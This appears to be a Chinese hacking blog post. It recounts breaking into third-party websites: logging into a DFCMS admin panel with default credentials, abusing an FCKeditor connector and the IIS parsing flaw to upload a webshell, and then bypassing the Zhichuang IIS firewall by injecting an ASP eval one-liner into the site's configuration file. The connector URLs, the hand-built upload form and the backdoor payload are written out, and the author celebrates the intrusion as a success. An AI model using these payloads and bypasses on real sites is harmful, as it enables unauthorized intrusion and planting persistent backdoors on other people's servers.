某天群里发了个后台 http://HdhCmsTest2cto测试数据 / manage/Login.asp,默认管理账号,让帮忙上传shell,出于好奇,打开看看 有个数据备份页面,不过被某个装B大黑阔换成了txt黑页
数据备份页面被装逼男删除,有上传http://HdhCmsTest2cto测试数据 / upload.asp,但上传木马POST包被拦截
这个站不好办了,旁注吧
找了好几个站,注入也不少,不过好几个MD5破解收费,菜B一个,没钱破解 为了简单起见,主要找默认管理密码的,也有几个,不过有的后台没法利用,有的是上传提示POST包被拦截
终于找到一个站http://HdhCmsTest2cto测试数据/ 后台http://HdhCmsTestxxxxx测试数据/manage/login.asp 鼎峰CMS (dfcms),admin+admin成功登录
看下后台,功能不少,有上传,有数据库备份(不过是自动备份的,不能自定义路径),还有网站基本信息管理(这里可以考虑插马),还有Fckeditor编辑器,这下应该突破几率大了 不过普通上传估计要被拦截的,数据库备份也利用不上。 配置文件插马考虑最后再用,万一插坏了,或者插入成功却被拦截了,整个站可能就要挂掉了。 有Fckeditor,先试试。 先浏览下Media目录 http://HdhCmsTestxxxx测试数据/ manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F 没问题,可以浏览 访问http://HdhCmsTestxxxx测试数据/manage/Inclu … nd=CreateFolder&;Type=Media&CurrentFolder=%2Fa.asp&NewFolderName=aaaa&uuid=1279789845662 创建a.asp文件夹 再浏览下Media目录,成功创建a.asp文件夹
最后构造上传表单 <form id="frmUpload" enctype="multipart/form-data" action="http://HdhCmsTestxxxx测试数据/manage/Include/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=Media&CurrentFolder=%2Fa.asp" method="post">Upload a new file:<br><input type="file" name="NewFile" size="50"><br><input id="btnUpload" type="submit" value="Upload"></form> 上传一句话图片得到shell http://HdhCmsTestxxxxx测试数据/uploadfiles/media/a.asp/abc.jpg
但是访问时出问题了,那个该死的提示又出来了
当前网页暂时无法访问(防火墙拦截)
没办法,怎么办,问了群里人,没人鸟我,那自己百度喽 百度得知,原来是智创IIS防火墙,看来菜B对这些防范绕过什么的还有待加强
找到一篇文章,讲怎么突破的智创的 当利用IIS解析 漏洞 的时候就会被认为是恶意脚本,从而被墙掉 访问这样的马是会被拦截的:upload/1. asp /2_asp;jpg 访问这样的马不会被拦截:upload/2.asp;.jpg 这样如果fckeditor的二次上传可以利用的话,那就能突破了。不幸的是二次上传被修复了
最后还有一招,就是配置文件插马了 既然上面说拦截的IIS解析,说明拦截的不是木马,或者说只要有变形的一句话就可能可以绕过了。 决定用这个变形一句话。 <%BBBB=request("aaaa")%><%eval(BBBB)%> 在公司地址后面加上 "%><%BBBB=request("aaaa")%><%eval(BBBB)%><%'
保存,没什么问题。不知道插入成功没有 页面下方配置文件地址已经给出来了include/vars.asp 直接访问是空白,没报错也没被拦截 用菜刀连接,成功!!!
上传个大马试试,成功上传,访问也可以 这样看来智创只是拦截IIS解析的问题,而不能识别脚本是不是木马 另外也对上传的POST数据包进行过滤,这里通过配置文件插入变形一句话成功绕过
查看更多关于配置文件插马绕过智创IIS防火墙 - 网站安全 - 自的详细内容...